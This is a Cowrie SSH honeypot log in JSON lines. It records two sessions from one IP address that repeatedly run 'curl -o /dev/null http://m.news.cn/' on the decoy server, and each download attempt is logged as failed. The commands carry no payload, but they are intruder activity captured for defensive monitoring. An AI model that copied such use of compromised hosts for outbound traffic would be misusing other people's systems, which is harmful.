{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.854874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.857024Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.871556Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.873010Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.898617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.899725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.901815Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.902943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.918467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.920011Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.941981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.943292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.946595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.947798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.963160Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.983965Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.985522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.987293Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:06.992019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:06.992967Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.011713Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.035932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.037485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.041126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.042742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.044056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.067180Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.085145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.086562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.088910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.090087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.100480Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.131093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.132289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.134315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.135467Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.151379Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.152960Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.169738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.170937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.173123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.174036Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.191478Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.192818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.215484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.216541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.220382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.221303Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.240024Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.241674Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.259358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.260529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.265894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.266885Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.297154Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.299956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.352232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.353886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.363379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.364525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.371159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.372277Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.389844Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.391398Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.410434Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.411707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.417757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.419136Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.436781Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.438161Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.452683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.453927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.459571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.460881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.480240Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.482583Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.493068Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.494421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.500677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.501957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.519396Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.520771Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.532840Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.534053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.541214Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.542501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.564840Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.566853Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.576234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.577510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.591187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.592878Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.610541Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.618231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.619665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.628566Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.633593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.634845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.654407Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.655642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.657718Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.675223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.677971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.679301Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.691809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.693083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.716635Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.719562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.720894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.733484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.734895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.746337Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.771225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.772712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.777953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.778907Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.801753Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.833088Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.834348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.847427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.849525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.906884Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.920469Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.922018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.924965Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:07.934464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.935880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:07.999279Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:08.002249Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
